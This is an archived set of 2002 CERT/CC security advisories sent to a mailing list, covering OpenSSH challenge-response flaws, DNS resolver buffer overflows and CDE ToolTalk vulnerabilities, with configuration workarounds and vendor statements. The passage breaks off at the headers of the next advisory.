vulnerabilities corrected in OpenSSH 3.4. More information about vendor-specific patches can be found in the vendor section of this document. Because the publication of this advisory was unexpectedly accelerated, statements from all of the affected vendors were not available at publication time. We will update this document as vendors provide additional information. Disable SSH protocol version 2 Since both vulnerabilities are present only in protocol version 2 features, disabling version 2 of the protocol will prevent both vulnerabilities from being exploited. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: Protocol 1 This option may set to "2,1" by default. System administrators should be aware that disabling protocol version 2 may prevent the sshd daemon from accepting connections in certain configurations. Applying one or both of the configuration changes described below may be a less disruptive workaround for this problem. Disable challenge response authentication For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code by setting the "ChallengeResponseAuthentication" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: ChallengeResponseAuthentication no This option may be enabled (set to "yes") by default. This workaround should prevent the first vulnerability from being exploited if SKEY or BSD_AUTH authentication is used. It will not prevent the possible exploitation of the vulnerability via PAM interactive keyboard authentication. Disable PAM authentication via interactive keyboard For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code affecting the PAM authentication issue by setting the "PAMAuthenticationViaKbdInt" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: PAMAuthenticationViaKbdInt no This option may be disabled (set to "no") by default. This workaround should prevent the second vulnerability from being exploited if PAM interactive keyboard authentication is used. It will not prevent the possible exploitation of the vulnerability via SKEY or BSD_AUTH authentication. Disable both options in older versions of OpenSSH For OpenSSH versions between 2.3.1p1 and 2.9, system adminstrators will instead need to set the following options in their ssh configuration file: KbdInteractiveAuthentication no ChallengeResponseAuthentication no Setting both of these options is believed to prevent the exploitation of the vulnerabilities regardless of which authentication mechanisms are used. Use privilege separation to minimize impact System administrators running OpenSSH versions 3.2 or 3.3 may be able to reduce the impact of this vulnerability by enabling the "UsePrivilegeSeparation" configuration option in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: UsePrivilegeSeparation yes This workaround does not prevent these vulnerabilities from being exploited, however due to the privilege separation mechanism, the intruder may be limited to a constrained chroot environment with restricted privileges. This workaround will not prevent these vulnerabilities from creating a denial-of-service condition. Not all operating system vendors have implemented the privilege separation code, and on some operating systems, it may limit the functionality of OpenSSH. System administrators are encouraged to carefully review the implications of using the workaround in their environment, and use a more comprehensive solution if one is available. The use of privilege separation to limit the impact of future vulnerabilities is encouraged. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services. Software Security Response Team x-ref:SSRT2263 At the time of writing this document, Compaq is currently investigating the potential impact to HP Tru64 UNIX, commercial version of SSH for V5.1a. As further information becomes available notice will be provided of the completion/availability of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel. Caldera Caldera OpenLinux OpenSSH has neither the S/KEY nor BSD Auth features compiled in, so it is not vulnerable to the Challenge/Response vulnerability. We do have the ChallengeResponseAuthentication option on by default, however, so to be safe, we recommend that the option be disabled in the sshd_config file. In addition, the sshd_config PAMAuthenticationViaKbdInt option is off by default, so OpenLinux is not vulnerable to the other alleged vulnerability in a default configuration, either. However, Caldera recommends that this option be disabled if it has been enabled by the system administrator. Cray, Inc. Cray, Inc. has found the OpenSSH released in Cray Open Software 3.0 to be vulnerable. Please see Field Notice 5105 and spr 722588 for fix information. Debian Debian 2.2 (the current stable release) is not affected by these problems. The current versions of our "testing" distribution, to become Debian 3.0, and our "unstable" distribution, are both affected by default. We recommend that users be certain that both: ChallengeResponseAuthentication no and PAMAuthenticationViaKbdInt no are present and uncommented in /etc/ssh/sshd_config (and that the server is restarted). Also, we recommend the use of version 3.3p1, now available from security.debian.org (DSA-134). Stable users do not need to upgrade and may wish to wait until the packages have received better testing. We intend to provide 3.4p1 packages in the near future. Engarde Guardian Digital ships OpenSSH in all versions of EnGarde Secure Linux. Version 3.3p1 was introduced by ESA-20020625-015 on June 25, 2002. This update introduces privilege separation. All users are strongly urged to upgrade to this version as soon as possible. An upgrade to version 3.4p1 (which properly fixes the bugs) will be made available sometime in the next few days. Hewlett-Packard Company Hewlett-Packard provides a version of SSH: HP-UX Secure Shell (T1471AA) for HP-UX versions 11.00 and 11i. We are investigating to determine whether this product is vulnerable. IBM Corporation IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here as is the version of OpenSSH available for downloading from the IBM Linux Affinity website. Anyone running this version is advised to follow the recommendations above to limit their vulnerability. We working with the changes for version 3.4 and will have a new package availble for download as soon as possible. When available the new packages can be downloaded from: http://www6.software.ibm.com/dl/aixtbx/aixtbx-p This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first. Lotus Lotus products are not vulnerable to this problem. Mandrake Software MandrakeSoft released OpenSSH 3.3p1 in updates Monday night to mitigate this vulnerability. Updates to OpenSSH 3.4p1 will be available for download later this week. Microsoft Corporation Microsoft products are not affected by the issues detailed in this advisory. Network Appliance NetApp systems are not vulnerable to this problem. OpenBSD See http://www.openbsd.org/errata.html#sshd OpenSSH See http://www.openssh.com/txt/preauth.adv Process Software MultiNet, TCPware, and SSH for OpenVMS are not affected by the problems outlined in this advisory. RedHat Inc. Red Hat Linux versions 7, 7.1, 7.2 and 7.3 as well as Red Hat Linux Advanced Server version 2.1 ship with OpenSSH. The Red Hat Linux OpenSSH packages were not compiled with either BSD_AUTH or SKEY enabled, therefore in order to be vulnerable to this issue a user would need to have enabled the configuration option "PAMAuthenticationViaKbdInt" in their sshd configuration file (the default is disabled). We are continuing to investigate this vulnerability and will release updated packages where appropriate. SGI At this time, SGI does not ship OpenSSH as a part of IRIX. The OpenSSH privilege separation code mostly works with IRIX, but it uses a flag to mmap that isn't in IRIX (MAP_ANON) for compression so you can't have both on at the same time. IRIX doesn't ship with PAM so a lot of the PAM issues aren't issues for us. _________________________________________________________________ The CERT/CC thanks Theo de Raadt and Markus Friedl of the OpenSSH project for their technical assistance in producing this advisory. _________________________________________________________________ Author: Cory F. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 26, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPRpGQ6CVPMXQI2HJAQEC1QP/eqRQzNmK0B1h5DvNLtTFmey8wOpfrSpX PHbJ2Ps4IYfu+OepUH7UEDGoYkza5jpIoqz+UeRmJfq51IU2RCwcfOOEkbLslra7 yFEM9oWIVCwC6cOvlkzlXA6cd2uX6YonNxYZ/6tUs3BmQVKxCrzDXBEWV6HC3zis 1qgt5S8MRYM= =+K4J -----END PGP SIGNATURE----- From - Fri Jun 28 16:21:10 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g5SNJYtq015690; Fri, 28 Jun 2002 16:19:34 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.12) with SMTP id RAA03318; Fri, 28 Jun 2002 17:19:29 -0400 (EDT) Date: Fri, 28 Jun 2002 17:19:29 -0400 (EDT) Received: by canaveral.red.cert.org; Fri, 28 Jun 2002 17:13:32 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-19 Buffer Overflow in Multiple DNS Resolver Libraries X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 371 Status: RO X-Status: X-Keywords: X-UID: 54 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-19 Buffer Overflow in Multiple DNS Resolver Libraries Original release date: June 28, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Applications using vulnerable implementations of the Domain Name System (DNS) resolver libraries, which include, but are not limited to: * Internet Software Consortium (ISC) Berkeley Internet Name Domain (BIND) DNS resolver library (libbind) * Berkeley Software Distribution (BSD) DNS resolver library (libc) Overview A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Operating systems and applications that utilize vulnerable DNS resolver libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system. I. Description The DNS protocol provides name, address, and other information about Internet Protocol (IP) networks and devices. To access DNS information, a network application uses the resolver to perform DNS queries on its behalf. Resolver functionality is commonly implemented in libraries that are included with operating systems. Multiple implementations of DNS resolver libraries contain a remotely exploitable buffer overflow vulnerability in the way the resolver handles DNS responses. Both BSD (libc) and ISC (libbind) resolver libraries share a common code base and are vulnerable to this problem; any DNS resolver implementation that derives code from either of these libraries may also be vulnerable. Network applications that makes use of vulnerable resolver libraries are likely to be affected, therefore this problem is not limited to DNS or BIND servers. Vulnerability Note VU#803539 lists the vendors that have been contacted about this vulnerability: http://www.kb.cert.org/vuls/id/803539 This vulnerability is not the same as the Sendmail issue discussed in Vulnerability Note VU#814627: http://www.kb.cert.org/vuls/id/814627 II. Impact An attacker who is able to send malicious DNS responses could remotely exploit this vulnerability to execute arbitrary code or cause a denial of service on vulnerable systems. Any code executed by the attacker would run with the privileges of the process that calls the vulnerable resolver function. Note that an attacker could cause one of the victim's network services to make a DNS request to a DNS server under the attacker's control. This would permit the attacker to remotely exploit this vulnerability. III. Solution Upgrade to a corrected version of the DNS resolver libraries Note that DNS resolver libraries can be used by multiple applications on most systems. It may be necessary to upgrade or apply multiple patches and then recompile statically linked applications. Applications that are statically linked must be recompiled using patched resolver libraries. Applications that are dynamically linked do not need to be recompiled; however, running services need to be restarted in order to use the patched resolver libraries. System administrators should consider the following process when addressing this issue: 1. Patch or obtain updated resolver libraries. 2. Restart any dynamically linked services that make use of the resolver libraries. 3. Recompile any statically linked applications using the patched or updated resolver libraries. Use a local caching DNS server Using a local caching DNS server that reconstructs DNS responses will prevent malicious responses from reaching systems using vulnerable DNS resolver libraries. For example, BIND 9 reconstructs responses in this way, with the exception of forwarded dynamic DNS update messages. Note that BIND 8 does not reconstruct all responses; therefore this workaround may not be effective when using BIND 8 as a caching DNS server. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Compaq SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team x-ref:SSRT2270 At the time of writing this document, Compaq is currently investigating the potential impact to Compaq's released Operating System software products. As further information becomes available Compaq will provide notice of the completion/availibility of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel. Cray, Inc. The DNS resolver code supplied by Cray, Inc. in Unicos and Unicos/mk is vulnerable. SPR 722619 has been opened to track this problem. FreeBSD See ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:28. resolv.asc GNU adns adns is not derived from BIND libresolv. Furthermore, it does not support a gethostbyname-like interface (which is where the bug in BIND libresolv is). Therefore, it is not vulnerable. For more information on GNU adns, see: http://www.gnu.org/software/adns/ http://www.chiark.greenend.org.uk/~ian/adns/ Internet Software Consortium All versions of BIND 4 from 4.8.3 prior to BIND 4.9.9 are vulnerable. All versions of BIND 8 prior to BIND 8.2.6 are vulnerable. All versions of BIND 8.3.x prior to BIND 8.3.3 are vulnerable. BIND versions BIND 9.2.0 and BIND 9.2.1 are vulnerable. BIND version 4.8 does not appear to be vulnerable. BIND versions BIND 9.0.x and BIND 9.1.x are not vulnerable. 'named' itself is not vulnerable. Updated releases can be found at: ftp://ftp.isc.org/isc/bind/src/4.9.9/ ftp://ftp.isc.org/isc/bind/src/8.2.6/ ftp://ftp.isc.org/isc/bind/src/8.3.3/ ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.3.3/ BIND 9 contains a copy of the BIND 8.3.x resolver library (lib/bind). This will be updated with the next BIND 9 releases (9.2.2/9.3.0) in the meantime please use the original in BIND 8.3.3. In addition the BIND 9 'named' can be used to prevent malformed answers reaching vulnerable clients. Vendors wishing additional patches should contact bind-bugs@isc.org. Query about BIND 4 and BIND 8 should be addressed to bind-bugs@isc.org. Query about BIND 9 should be addressed to bind9-bugs@isc.org. Microsoft Microsoft products do not use the libraries in question. Microsoft products are not affected by this issue. OpenBSD [T]he resolver libraries in question got copied far and wide. They used to have a hell of a lot of bugs in them. Now might be a good time for people to compare each others' libraries to each other. I would urge them to compare against the OpenBSD ones, where we've spent a lot of time on, but of course we still missed this. But perhaps people can then share some around. Not everyone is going to move to the bind9 stuff, since it is very different. NetBSD See ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-0 06.txt.asc Network Appliance Some NetApp systems are vulnerable to this problem. Check NOW (http://now.netapp.com) for information on whether your system is vulnerable and the appropriate patch release that you should install. SGI SGI is looking into the matter. _________________________________________________________________ The CERT Coordination Center thanks Joost Pol of PINE-CERT and the FreeBSD Project for their analysis of these vulnerabilities. _________________________________________________________________ Feedback can be directed to the authors: Art Manion and Jason A. Rafail _________________________________________________________________ Appendix B. - References 1. http://www.pine.nl/advisories/pine-cert-20020601.asc ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-19.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 28, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPRzRIKCVPMXQI2HJAQFUUAP+JrIx1x3vF0BL7zFcURQSOOIsmEoGzqAP B+xs5kf4Oy5uYRRLASvYFh/XjnyGXIA5v8ECWx00B52PBKi7aPQS5o4Kiz1rxkFf +c5oziLDXNwy4Vj2ArUjdzM47Ghrq8QXHBOoHaK5OWAF6tywbOklHt50T61OWzGu 5WGow8NNw9I= =PbO6 -----END PGP SIGNATURE----- From - Wed Jul 10 19:57:05 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g6B2lniQ030272; Wed, 10 Jul 2002 19:47:49 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.12) with SMTP id VAA26793; Wed, 10 Jul 2002 21:36:45 -0400 (EDT) Date: Wed, 10 Jul 2002 21:36:45 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 10 Jul 2002 21:30:55 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-20 Multiple Vulnerabilities in CDE ToolTalk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 399 Status: RO X-Status: X-Keywords: X-UID: 55 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-20 Multiple Vulnerabilities in CDE ToolTalk Original release date: July 10, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running CDE ToolTalk Overview Two vulnerabilities have been discovered in the Common Desktop Environment (CDE) ToolTalk RPC database server. The first vulnerability could be used by a remote attacker to delete arbitrary files, cause a denial of service, or possibly execute arbitrary code or commands. The second vulnerability could allow a local attacker to overwrite arbitrary files with contents of the attacker's choice. I. Description The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. CDE ToolTalk is a message brokering system that provides an architecture for applications to communicate with each other across hosts and platforms. The ToolTalk RPC database server, rpc.ttdbserverd, manages communication between ToolTalk applications. For more information about CDE, see http://www.opengroup.org/cde/ http://www.opengroup.org/desktop/faq/ This advisory addresses two new vulnerabilities in the CDE ToolTalk RPC database server. These vulnerabilities are summarized below and are described in further detail in their respective vulnerability notes. A list previously documented problems in CDE can be found Appendix B. VU#975403 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file descriptor argument to _TT_ISCLOSE() The ToolTalk RPC database server does not validate the range of an argument passed to the procedure _TT_ISCLOSE(). As a result, certain locations in memory can be overwritten with zeros. For more information, please see VU#975403: http://www.kb.cert.org/vuls/id/975403 This vulnerability has been assigned CAN-2002-0677 by the Common Vulnerabilities and Exposures (CVE) group. VU#299816 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file operations The ToolTalk RPC database server does not ensure that the target of a file write operation is a valid file and not a symbolic link. For more information, please see VU#299816: http://www.kb.cert.org/vuls/id/299816 This vulnerability has been assigned CAN-2002-0678 by the Common Vulnerabilities and Exposures (CVE) group. II. Impact VU#975403 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file descriptor argument to _TT_ISCLOSE() By issuing a specially crafted call to the procedure _TT_ISCLOSE(), a remote attacker could overwrite certain locations in memory with zeros. Using a combination of techniques that include valid ToolTalk RPC requests, an attacker could leverage this vulnerability to delete any file that is accessible by the ToolTalk RPC database server. Since the server typically runs with root privileges, any file on a vulnerable system could be deleted. Overwriting memory or deleting files could cause a denial of service. It may also be possible to execute arbitrary code and commands. VU#299816 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file operations By referencing a specially crafted symbolic link in certain ToolTalk RPC requests, a local attacker could overwrite any file that is accessible by the the ToolTalk RPC database server with contents of the attacker's choice. Since the server typically runs with root privileges, any file on a vulnerable system could be overwritten. Overwriting root-owned files could lead to lead to privilege escalation or cause a denial of service. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Disable vulnerable service Until patches are available and can be applied, you may wish to disable the ToolTalk RPC database service. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. On a typical CDE system, it should be possible to disable rpc.ttdbserverd by commenting out the relevant entries in /etc/inetd.conf and if necessary, /etc/rpc, and then by restarting the inetd process. The program number for the ToolTalk RPC database server is 100083. If references to 100083 or rpc.ttdbserverd appear in /etc/inetd.conf or /etc/rpc or in output from the rpcinfo(1M) and ps(1) commands, then the ToolTalk RPC database server may be running. The following example was taken from a system running SunOS 5.8 (Solaris 8): /etc/inetd.conf ... # # Sun ToolTalk Database Server # 100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd\ rpc.ttdbserverd (line wrapped) ... # rpcinfo -p program vers proto port service ... 100083 1 tcp 32773 ... # ps -ef UID PID PPID C STIME TTY TIME CMD ... root 355 164 0 19:31:27 ? 0:00 rpc.ttdbserverd ... Before deciding to disable the ToolTalk RPC database server or the RPC portmapper service, carefully consider your network configuration and service requirements. Block access to vulnerable service Until patches are available and can be applied, you may wish to block access to the ToolTalk RPC database server and possibly the RPC portmapper service from untrusted networks such as the Internet. Use a firewall or other packet-filtering technology to block the appropriate network ports. The ToolTalk RPC database server may be configured to use port 692/tcp or another port as indicated in output from the rpcinfo(1M) command. In the example above, the ToolTalk RPC database server is configured to use port 32773/tcp. The RPC portmapper service typically runs on ports 111/tcp and 111/udp. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from attacks that originate from the internal network. Before deciding to block or restrict access to the ToolTalk RPC database server or the RPC portmapper service, carefully consider your network configuration and service requirements. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Caldera, Inc. Caldera Open UNIX and Caldera UnixWare provide the CDE ttdbserverd daemon, and are vulnerable to these issues. We have prepared fixes for those two operating systems, and will make them available as soon as these issues are made public. SCO OpenServer and Caldera OpenLinux do not provide CDE, and are therefore not vulnerable. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team CROSS REFERENCE: SSRT2251 At this time Compaq does have solutions in final testing and will publish HP Tru64 UNIX security bulletin (SSRT2251) with patch information as soon as testing has completed and kits are available from the support ftp web site. A recommended workaround however is to disable rpc.ttdbserver until solutions are available. This should only create a potential problem for public software packages applications that use the RPC-based ToolTalk database server. This step should be evaluated against the risks identified, your security measures environment, and potential impact of other products that may use the ToolTalk database server. To disable rpc.ttdbserverd: + Comment out the following line in /etc/inetd.conf: rpc.ttdbserverd stream tcp swait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd (line wrapped) + Force inetd to re-read the configuration file by executing the inetd -h command. Note: The internet daemon should kill the currently running rpc.ttdbserver. If not, manually kill any existing rpc.ttdbserverd process. Cray, Inc. Cray, Inc. does include ToolTalk within the CrayTools product. However, rpc.ttdbserverd is not turned on or used by any Cray provided application. Since a site may have turned this on for their own use, they can always remove the binary /opt/ctl/bin/rpc.ttdbserverd if they are concerned. Fujitsu Fujitsu's UXP/V operating system is affected by the vulnerability reported in VU#975403 [or VU#299816] because UXP/V does not support any CDE functionalties. Hewlett-Packard Company HP9000 Series 700/800 running HP-UX releases 10.10, 10.20, 11.00, and 11.11 are vulnerable. Until patches are available, install the appropriate file to replace rpc.ttdbserver. Download rpc.ttdbserver.tar.gz from the ftp site. This file is temporary and will be deleted when patches are available from the standard HP web sites, including itrc.hp.com. System: hprc.external.hp.com (192.170.19.51) Login: ttdb1 Password: ttdb1 FTP Access: ftp://ttdb1:ttdb1@hprc.external.hp.com/ ftp://ttdb1:ttdb1@192.170.19.51/ File: rpc.ttdbserver.tar.gz MD5: da1be3aaf70d0e2393bd9a03feaf4b1d An HP security bulletin will be released with more information. IBM Corporation The CDE desktop product shipped with AIX is vulnerable to both the issues detailed above in the advisory. This affects AIX releases 4.3.3 and 5.1.0 An efix package will be available shortly from the IBM software ftp site. The efix packages can be downloaded from ftp.software.ibm.com/aix/efixes/security. This directory contains a README file that gives further details on the efix packages. The following APARs will be available in the near future: AIX 4.3.3: IY32368 AIX 5.1.0: IY32370 SGI SGI acknowledges the ToolTalk vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on http://www.sgi.com/support/security/. Sun Microsystems, Inc. The Solaris RPC-based ToolTalk database server, rpc.ttdbserver, is vulnerable to the two vulnerabilities [VU#975403 VU#299816] described in this advisory in all currently supported versions of Solaris: Solaris 2.5.1, 2.6, 7, 8, and 9 Patches are being generated for all of the above releases. Sun will publish a Sun Security Bulletin and a Sun Alert for this issue. The Sun Alert will be available from: http://sunsolve.sun.com The patches will be available from: http://sunsolve.sun.com/securitypatch Sun Security Bulletins are available from: http://sunsolve.sun.com/security Xi Graphics Xi Graphics deXtop CDE v2.1 is vulnerable to this attack. When announced, the update and accompanying text file will be: ftp://ftp.xig.com/pub/updates/dextop/2.1/DEX2100.016.tar.\ gz (line wrapped) ftp://ftp.xig.com/pub/updates/dextop/2.1/DEX2100.016.txt Most sites do not need to use the ToolTalk server daemon. Xi Graphics Security recommends that non-essential services are never enabled. To disable the ToolTalk server on your system, edit /etc/inetd.conf and comment out, or remove, the 'rpc.ttdbserver' line. Then, either restart inetd, or reboot your machine. Appendix B. - References * http://www.opengroup.org/cde/ * http://www.opengroup.org/desktop/faq/ * http://www.cert.org/advisories/CA-2002-01.html * http://www.cert.org/advisories/CA-2001-31.html * http://www.kb.cert.org/vuls/id/172583 * http://www.cert.org/advisories/CA-2001-27.html * http://www.kb.cert.org/vuls/id/595507 * http://www.kb.cert.org/vuls/id/860296 * http://www.cert.org/advisories/CA-1999-11.html * http://www.cert.org/advisories/CA-1998-11.html * http://www.cert.org/advisories/CA-1998-02.html _________________________________________________________________ The CERT Coordination Center thanks the reporters, Iván Arce and Ricardo Quesada of CORE SECURITY TECHNOLOGIES, for their assistance and cooperation in producing this document. _________________________________________________________________ Author: Art Manion ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-20.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History July 10, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPSzfNKCVPMXQI2HJAQGb3AP9Fh4bIxXmwBxxhlcJc+OCvbwWAcOYhO4X ymhM/lO/3MvlBof2iANKGAgC0+DNGg+NTHuvpFnfCDdyUR6teiPfxBxJZWTLrPGQ bWmYzgs3A+K1Tl+b0wMbLm0BuizzCyoKegTUQ8Qygt4kWQ26NEMMoeE/XCtID0LX L5PLJReDnJY= =sjVU -----END PGP SIGNATURE----- From - Mon Jul 22 18:07:00 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g6N13xDu012820; Mon, 22 Jul 2002 18:03:59 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.12) with SMTP id TAA16975; Mon, 22 Jul 2002 19:11:06 -0400 (EDT) Date: Mon, 22 Jul 2002 19:11:06 -0400 (EDT) Received: by canaveral.red.cert.org; Mon, 22 Jul 2002 19:05:32 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-21 Vulnerability in PHP X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 